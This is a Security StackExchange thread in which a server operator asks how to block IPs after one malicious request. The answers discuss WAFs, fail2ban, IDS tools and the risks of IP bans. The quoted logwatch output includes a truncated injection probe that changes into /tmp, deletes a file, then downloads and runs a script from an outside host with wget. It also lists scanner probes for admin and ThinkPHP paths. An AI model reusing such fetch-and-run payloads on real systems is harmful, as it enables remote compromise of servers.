# How do I immediately block IPs once they do a single malicious act?

Tags: server, logging

I get this in logwatch

```
 A total of 21 sites probed the server 
    1.144.111.208
    123.31.43.40
    174.216.5.13
    185.156.177.234
    188.175.196.105
    188.71.236.121
    197.229.2.33
    197.229.2.44
    197.229.2.89
    223.206.234.87
    69.123.106.157
    71.80.149.79
    73.240.179.91
    73.25.58.45
    73.85.133.118
    75.66.221.173
    78.49.31.220
    85.107.113.45
    89.172.162.25
    94.199.18.198
    99.203.97.108


 Requests with error response codes
    400 Bad Request
       /: 12 Time(s)
       /admin/index.php: 1 Time(s)
       /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91. ... sh+.j;echo+DONE: 1 Time(s)
       null: 1 Time(s)
    404 Not Found
       /modules/base/js/owa.tracker-combined-min.js: 29 Time(s)
       /robots.txt: 23 Time(s)
       /cgi-bin/file_transfer.cgi: 11 Time(s)
       /administrator/: 3 Time(s)
       /TP/html/public/index.php: 2 Time(s)
       /TP/index.php: 2 Time(s)
       /TP/public/index.php: 2 Time(s)
       /ads.txt: 2 Time(s)
       /elrekt.php: 2 Time(s)
       /html/public/index.php: 2 Time(s)
       /index.php: 2 Time(s)
       /public/index.php: 2 Time(s)
       /thinkphp/html/public/index.php: 2 Time(s)
       /HER7400Watt: 1 Time(s)
       /admin/config.php?password[]=bebydviyx&username=admin: 1 Time(s)
       /api/v1: 1 Time(s)
       /sitemap.xml: 1 Time(s)
    405 Method Not Allowed
       ip.ws.126.net:443: 1 Time(s)
    408 Request Timeout
       null: 21 Time(s)
```

Some activities are never coming from a good place.

How do I immediately block them once they do a single one of those activities?

Comment: Use a WAF instead?

Comment: A Snort rule that identifies these attacks could dynamically add records to your firewall rules. But such automation could backfire: what if one worker at Amazon had an infected laptop, and you saw the packet coming from their corporate NAT’s address? You would block all 100,000 Amazon employees from your site because one guy got hacked?

Comment: fail2ban is a configurable tool that can temporarily block IP addresses based on malicious activity seen in logs. That said, most of these requests are likely harmless, and you will never be able to stop all bots from hitting your site.

Comment: @multithr3at3d /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91. ... sh+.j;echo+DONE: 1 Time(s) is not harmless

Comment: @VitalisHommel Well, it's harmless unless you are not patched or are running vulnerable code. But in that case, 1 request would be all that is needed to cause damage.

Comment: both 400 and 404 can result from simple typographical errors in URIs. The others can be quite harmless as well. Several of the 400 and 404 errors in your list seem to be the result of search engine crawlers rather than any human trying to access your server.

Comment: You want to ban Googlebot? (sitemap.xml and robots.txt)

Comment: @user253751 Everyone wants that :D

Comment: @Overmind Everyone who doesn't want their site to be on Google. Do you want your site to be on Google?

Comment: No, pass on that offer.

Answer (score 1):

You are asking the wrong question, for a number of reasons.  These are mainly spelled out in comments, but I think it's worthwhile to put it all in a coherent answer.  There are a number of critical issues that you'll run into if you attempted to do this:

### 1. Identifying malicious acts is the hard part

Blocking an IP that you suspect is performing malicious activities is easy.  This is what a firewall is for after all.  The tricky part is correctly identifying malicious activity.  As [was pointed out](https://security.stackexchange.com/questions/224452/how-do-i-immediately-block-ips-once-they-do-a-single-malicious-act#comment458599_224452), at least some of your "malicious requests" were almost certainly search engines doing standard indexing.  You don't want to block them.  Moreover, requests that are actually malicious are often very difficult to identify.  It can be easy to look at it after the fact and decide, "Yup, this is definitely an XSS vector - ban it", but some well crafted payloads may be difficult even for trained security professionals to identify.  Teaching a computer to do it automatically is effectively impossible.  In fact, if you did manage to do that, you would have a security product that you could sell for ridiculous amounts of money.

### 2. Banning it after-the-fact is too late

If you ban an IP address after it makes a malicious request then [your ban has come too late](https://security.stackexchange.com/questions/224452/how-do-i-immediately-block-ips-once-they-do-a-single-malicious-act#comment458470_224452).  In many cases, a single request may be all that is necessary to do substantial damage.  If you ban an IP address after [little bobby tables registered](https://xkcd.com/327/), then your system will already be broken.

### 3. Banning IP addresses bans the wrong thing

It's easy to think that "Banning IP address" === "Banning attacker", but reality is far more complicated with [IPV4 and NATs](https://security.stackexchange.com/questions/224452/how-do-i-immediately-block-ips-once-they-do-a-single-malicious-act#comment458435_224452).  Home networks, companies, large government organizations, and sometimes even geographic regions may share a single IP address.  Even if banning an IP address actually banned an attacker, you will never know how many other legitimate users you accidentally banned as collateral damage.  You don't want to ban the IP address - you just want to ban the request.

### Solutions

A ban hammer is really the wrong tool - more finesse is required.  The most common solution is a WAF although even those are far from perfect.  The reality is that there is no easy way to security, and properly securing an application requires effort at all layers of it.  Tools like fail2ban perform tasks similar to what you are seeking, but are working at very specific levels of the application.  A broad "malicious activity" detector of the sort you are looking for is much, much, harder.

Answer (score 0):

I recommend implementing the mentioned fail2ban or alternatively, considering a Snort or Surricata IDS. They are all able to perform the task of blocking IPs after malicious activity.

Blocking IPs that aggressively will require you to implement whitelists for known good hosts to prevent accidental blocking. You should be more lenient and not block after just one instance.

Answer (score 0):

Consider installing [CSF+LFD](https://www.configserver.com/cp/csf.html) wich is a failban-like tool that also protects against SSH brute force attacks, SMTP attacks etc